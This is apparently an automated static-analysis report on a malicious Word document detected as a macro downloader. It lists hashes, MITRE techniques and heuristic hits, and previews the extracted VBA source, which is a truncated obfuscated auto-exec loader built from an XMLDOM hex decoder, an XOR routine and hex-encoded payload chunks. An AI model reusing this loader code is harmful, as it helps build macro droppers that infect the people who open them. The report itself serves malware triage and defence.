Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e5e70439c88a0727…

MALICIOUS

Office (OLE)

1.36 MB Created: 2018-06-11 09:05:00 Authoring application: Microsoft Office Word First seen: 2019-03-10
MD5: e484b89c0f6b69e9917c86800286e702 SHA-1: 75c6bf80e60cea7d876a271024eb7c16de8da659 SHA-256: e5e70439c88a07277414d973b11f4e572ca89cbf2b14987b4093cbf5d78c52a7
364 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information

The file is a malicious Office document containing obfuscated VBA macros. The macros are designed to execute automatically upon opening, as indicated by the presence of AutoOpen, Workbook_Open, and Auto_Open heuristics. The script uses CreateObject and appears to deobfuscate and execute a payload, likely a downloader, as suggested by the ClamAV detection name 'Doc.Downloader.Generic'. The document body explicitly instructs the user to enable macros, a common social engineering tactic.

Heuristics 11

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2516529 bytes
SHA-256: 84f5eb8046cc230cf500b7fcf58387d7ab9544c063a13ac302e3d81a826e91b4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6863 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Public arisenEvenhandedRepeatedly As String
Public hasteInventoryEmissaryMecca As String

Private Function chargecardRecordbreakingStrike(situationTheorizeWeak)
    On Error Resume Next
    Dim nullifyFastenSquallMorallyTwitch, inauguralSpunLikeInterrogation
    Set nullifyFastenSquallMorallyTwitch = CreateObject("Microsoft.XMLDOM")
    Set inauguralSpunLikeInterrogation = nullifyFastenSquallMorallyTwitch.createElement("annihilateRevalueBootstrapsWithoutOperatingroom")
    inauguralSpunLikeInterrogation.DataType = "bin.hex"
    inauguralSpunLikeInterrogation.Text = situationTheorizeWeak
    chargecardRecordbreakingStrike = inauguralSpunLikeInterrogation.NodeTypedValue
End Function

Function acquitFrightfulChirpSproutCocky(messyLiberalizeSteeringwheel As String, filmyStraddleSnorkel As Long) As String
    Dim heritageMisnomerNominal
    heritageMisnomerNominal = chargecardRecordbreakingStrike(messyLiberalizeSteeringwheel)
    Dim pearPacemakerSkylineJerseyInflamed As String
    pearPacemakerSkylineJerseyInflamed = ""

    For Each resumptionForestJudiciaryArtificially In heritageMisnomerNominal
        pearPacemakerSkylineJerseyInflamed = pearPacemakerSkylineJerseyInflamed & Chr(resumptionForestJudiciaryArtificially Xor filmyStraddleSnorkel)
    Next resumptionForestJudiciaryArtificially
    acquitFrightfulChirpSproutCocky = pearPacemakerSkylineJerseyInflamed
End Function
Sub haircutDebriefIngestImpatienceNoted()
    arisenEvenhandedRepeatedly = arisenEvenhandedRepeatedly & acquitFrightfulChirpSproutCocky("d0d2f6ebc5c5c5c5c5c2f1ceb7b5cec2d2ddeae8e3e7cbd5e3c5c5c5abbdcaebbcc8d3edd2e9e3c1c5c5c5c5d2ababd5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5", 132)
    arisenEvenhandedRepeatedly = arisenEvenhandedRepeatedly & acquitFrightfulChirpSproutCocky("5f5f5f5f5f355f5f5f5f4e31732b596f4d6a77442b5c296e5c5a4c752d78696e56544a2b6950792a2d726e2a312d4b594e7148787967674f727427724f447555285f7f6d735a674a555335", 30)
    arisenEvenhandedRepeatedly = arisenEvenhandedRepeatedly & acquitFrightfulChirpSproutCocky("f0abdbaddaa8c9eeeef5f8d1f7e5d5ced1d0ecfbd4ded7a4eae6d4aaabdaeaf9fec9c9e4fecba8ccfdf2cccfdff2b3ece6faefcab3d6fbd6f2fad6ebdfedf4f0d9efe4c6a9ade4dbcdcac4", 156)
    arisenEvenhandedRepeatedly = arisenEvenhandedRepeatedly & acquitFrightfulChirpSproutCocky("a7a0e1ff838b8bafbf998e88bb9da98dfda083a7ba83acffb080929eb2b2acb89ba487998cfce5e59298a9fcbdbffbb9febbafb98b8de19c9ebda0aefcf899ab98b3a8898b8cb2bab9b285", 202)
    arisenEvenhandedRepeatedly = arisenEvenhandedRepeatedly & acquitFrightfulChirpSproutCocky("0b013c1c3f0b0600101f1f1f3c1e28070c002b380e3c5a0559110213300f2f383b3828283d282c2c28245946032f242828282828464646464642282828102c2528380228282c062a28282d", 105)
    arisenEvenhandedRepeatedly = arisenEvenhandedRepeatedly & acquitFrightfulChirpSproutCocky("e4e6f6e6e6e6e6e6e6c8fff6e5e6e6e6f6e6e6e6e6fee6eee6e6e6e6e6e2e6e6f6e6e6e6e6e6c0e6e6e5f6e6e6e6e6e6e6e6e6e6e1e6e6e6e6e6e6e6e6e6e6e6d0e5e6e6e6e5e6e6e6e6e6", 167)
    arisenEvenhandedRepeatedly = arisenEvenhandedRepeatedly & acquitFrightfulChirpSproutCocky("dbdbdbdbd3dbcbdbdfdbdbd8dbdbdbd8dbdbdbdbdbdbdfdbdbdbdfdbdbdbdbdbdbdbdbd8dbdbdbdbd8cbdbcbd7dbcfcbdbdbdbd2ceefdbfdd9fddbdbdbdbdbdbdbdbdbdbdbdbdbdbdbdbdb", 154)
    arisenEvenhandedRepeatedly = arisenEvenhandedRepeatedly & acquitFrightfulChirpSproutCocky("fafafafafafafafafafafafafafafafafafafafaf9fafefaf1dcecfafafafafafafafafafafafafafafafafafafafafafafafafafafafafafafafafafafafafafafafafafafafafaf6ffd4", 187)
    arisenEvenhandedRepeatedly = arisenEvenhandedRepeatedly & acquitFrightfulChirpSproutCocky("70567370707070707070707070707070707070706870787055707c707070707070707070707070707070707070707070707070707070707070707070707f767d5c5e547d1e4670707e5a5a", 49)
    arisenEvenhandedRepeatedly =
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.